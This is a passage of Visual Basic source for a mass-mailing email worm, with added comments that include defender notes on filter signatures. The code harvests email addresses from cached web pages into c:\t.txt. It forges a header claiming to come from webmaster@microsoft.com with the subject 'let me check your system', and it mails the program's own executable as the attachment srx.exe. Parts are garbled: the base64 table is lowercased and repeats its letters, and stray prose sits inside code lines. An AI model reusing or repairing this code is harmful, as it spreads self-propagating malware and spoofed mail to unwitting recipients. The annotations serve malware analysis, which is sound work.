' cleared so the next call waits for fresh data.
private sub w4c(responsecode as string)

dim tt as single

dim ttt as single

tt = timer

while len(response) = 0

ttt = tt - timer

doevents

if ttt > 24 then

exit sub

end if

sleep 1

wend

while left(response, 3) <> responsecode

doevents

if ttt > 50 then

exit sub

end if

sleep 1

wend

response = ""

end sub

' Recursively walks the subfolders of dir and appends the addresses found in each one to
' c:\t.txt as a single ";"-separated line.
'
' dir: folder path; its subfolders are obtained through Scripting.FileSystemObject.
'
' For every subfolder, infht extracts addresses from its HTML files and listht recurses
' into it; an empty result is replaced by a hard-coded placeholder address. Errors are
' suppressed by "on error resume next".
'
' Defender note: this is address harvesting from the browser cache - a non-browser
' process reading many .htm/.html files under Temporary Internet Files and writing a
' list to a file in the root of C: is the observable behaviour.
sub listht(dir)

on error resume next

dim fso, ssfh, filh, s, f, d, q, a, textline

set fso = createobject("scripting.filesystemobject")

set ssfh = fso.getfolder(dir).subfolders

for each filh in ssfh

s = infht(filh.path)

listht (filh.path)

if s = "" then

s = "fuck@well.com"

end if

f = f & s & ";"

next

d = f

open "c:\t.txt" for append as #1

print #1, d

close #1

end sub

' Scans the .htm / .html files directly inside dir and returns the strings found after a
' quoted link marker, joined with ";".
'
' dir: folder path whose files are enumerated through Scripting.FileSystemObject.
' Returns: concatenation of every extracted string, each followed by ";"; empty when
'          nothing was found.
'
' For each matching file the lines are concatenated into q, then every position of q is
' tested against the marker; on a hit, characters are copied up to the next double quote.
' q is not reset between files, so text from earlier files is scanned again.
function infht(dir)

dim mlto as string

dim fso, cfh, filh, ext, textline, q, wwww

dim j as long, cnt as long

set fso = createobject("scripting.filesystemobject")

set cfh = fso.getfolder(dir).files

for each filh in cfh

ext = fso.getextensionname(filh.path)

ext = lcase(ext)

if (ext = "htm") or (ext = "html") then

open filh.path for input as #1

do while not eof(1)

line input #1, textline

q = q & textline

loop

close #1

for j = 1 to len(q)

if mid(q, j, 8) = """" & "mailt" then

mlto = ""

cnt = 0

do while mid(q, j + 8 + cnt, 1) <> """"

mlto = mlto + mid(q, j + 8 + cnt, 1)

cnt = cnt + 1

loop

wwww = wwww & mlto & ";"

end if

next

end if

next

infht = wwww

end function

' Resolves a shell special-folder identifier to a file-system path.
'
' csidl: CSIDL value passed to shgetspecialfolderlocation.
' Returns: the path text before the first NUL of a 512-character buffer when the
'          location call returns 0; otherwise an empty string.
private function getspecialfolder(csidl as long) as string

dim r as long

dim idl as itemidlist

dim path as string

r = shgetspecialfolderlocation(100, csidl, idl)

if r = 0 then

path$ = space$(512)

r = shgetpathfromidlist(byval idl.mkid.cb, byval path$)

getspecialfolder = left$(path, instr(path, chr$(0)) - 1)

exit function

end if

getspecialfolder = ""

end function

' Builds the message header block sent after the SMTP "data" command.
'
' Returns: From, Date, X-Mailer, recipient line, Subject and MIME headers concatenated in
'          that order, each terminated by CRLF.
'
' Defender note: every value is a fixed literal except the date, so the header set works
' as a static mail-filter signature for this sample as shown on the page: display name
' "administrators" with sender webmaster@microsoft.com, subject "let me check your
' system", x-mailer "mailsux9855097", multipart boundary "blimp", and the stray
' "by:alcotheskaler" line inside the MIME preamble.
private function hd() as string

dim fin as string, dh as string, recip as string

dim sdatenow as string, deit as string, phrom as string, topic as string, engine as string, myme as string

sdatenow = format(date, "ddd") & ", " & format(date, "dd mmm yyyy") & " " & format(time, "hh:mm:ss")

recip = "t subscribers" & vbcrlf

deit = "date:" + chr(32) + sdatenow + vbcrlf

phrom = "from: " & chr(34) & "administrators" & chr(34) & " <webmaster@microsoft.com>" + vbcrlf

topic = "subject:" + chr(32) + "let me check your system" + vbcrlf

engine = "x-mailer: mailsux9855097" + vbcrlf

' MIME preamble: multipart/related with an opening text/html part.
myme = "mime-version: 1.0" & vbcrlf & _

"content-type: multipart/related; boundary=" & _

chr(34) & "blimp" & chr(34) & "; type=" & chr(34) & _

"text/html" & chr(34) & vbcrlf & _

"by:alcotheskaler" & vbcrlf & _

"--blimp" & vbcrlf & _

"content-type: text/html; charset=us-ascii" & vbcrlf & _

"content-transfer-encoding: 7bit" & vbcrlf

dh = phrom & deit & engine & recip & topic & myme

hd = dh

end function

' Builds the attachment section of the message from the program's own executable.
'
' Returns: the MIME part produced by e32 for <app.path>\<app.exename>.exe followed by the
'          closing "--blimp--" boundary.
'
' Defender note: this is the self-propagation step - the running binary mails a copy of
' itself. Gateway policies that reject executable attachments stop it regardless of the
' file name used.
private function a12() as string

dim fin as string

dim phile as string

dim ss as string

ss = app.path

if right(ss,1) <> "\" then ss = ss & "\"

fin = fin & e32(ss & app.exename & ".exe")

fin = fin & vbcrlf & "--blimp--" & vbcrlf

a12 = fin

end function

' Wraps one file as a MIME attachment part.
'
' vsfullpathname: path of the file whose encoded content b64 returns.
' Returns: boundary line "--blimp", part headers declaring application/octet-stream,
'          base64 transfer encoding and the fixed attachment name "srx.exe", followed by
'          the output of b64.
'
' Defender note: the attachment name "srx.exe" is a fixed literal on this page and can be
' matched by attachment-name rules in addition to type-based blocking.
public function e32(byval vsfullpathname as string) as string

dim fin as string

fin = vbcrlf & "--blimp" & vbnewline

fin = fin & "content-type: application/octet-stream; name=" & chr(34) & "srx.exe" & chr(34) & vbnewline

fin = fin & "content-transfer-encoding: base64" & vbnewline

fin = fin & "content-disposition: attachment; filename=" & chr(34) & "srx.exe" & chr(34) & vbnewline

fin = fin & b64(vsfullpathname)

e32 = fin

end function

' Reads a file in binary mode and returns a text encoding of its bytes, intended as the
' Base64 body of the attachment built by e32.
'
' vsfullpathname: path of the file to read.
' Returns: a CRLF followed by the encoded text, broken into lines once the working line
'          exceeds 64 characters, with "=" / "==" appended for a 2-byte / 1-byte tail.
'
' Structure: the main loop consumes the file three bytes at a time and appends four
' characters looked up in base64tab per group; the tail block handles the remaining one
' or two bytes; the file is closed before returning.
public function b64(byval vsfullpathname as string) as string

dim b as integer

dim base64tab as variant

dim bin(3) as byte

dim s as string

dim l as long

dim i as long

dim filein as long

dim sresult as string

dim n as long

' 64-entry lookup table indexed by each 6-bit value.
base64tab = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")

erase bin

l = 0: i = 0: filein = 0: b = 0:

s = ""

filein = freefile

open vsfullpathname for binary as filein

sresult = s & vbcrlf

s = ""

' l = length of the part of the file that divides evenly into 3-byte groups.
l = lof(filein) - (lof(filein) mod 3)

for i = 1 to l step 3

get filein, , bin(0)

get filein, , bin(1)

get filein, , bin(2)

' Flush the working line to the result once it is longer than 64 characters.
if len(s) > 64 then

s = s & vbcrlf

sresult = sresult & s

s = ""

end if

b = (bin(n) \ 4) and &h3f

s = s & base64tab(b)

b = ((bin(n) and &h3) * 16) or ((bin(1) \ 16) and &hf)

s = s & base64tab(b)

b = ((bin(n + 1) and &hf) * 4) or ((bin(2) \ 64) and &h3)

s = s & base64tab(b)

b = bin(n + 2) and &h3f

s = s & base64tab(b)

next i

' Tail: one or two bytes left over after the last full group.
if not (lof(filein) mod 3 = 0) then

for i = 1 to (lof(filein) mod 3)

get filein, , bin(i - 1)

next i

if (lof(filein) mod 3) = 2 then

b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)

s = s & base64tab(b)

b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)

s = s & base64tab(b)

b = ((bin(1) and &hf) * 4) or ((bin(2) \ 64) and &h3)

s = s & base64tab(b)

s = s & "="

else

b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)

s = s & base64tab(b)

b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)

s = s & base64tab(b)

s = s & "=="

end if

end if

' Append whatever is left in the working line, then release the file.
if s <> "" then
s = s & vbcrlf
sresult = sresult & s
end if
s = ""
close filein
b64 = sresult
end function
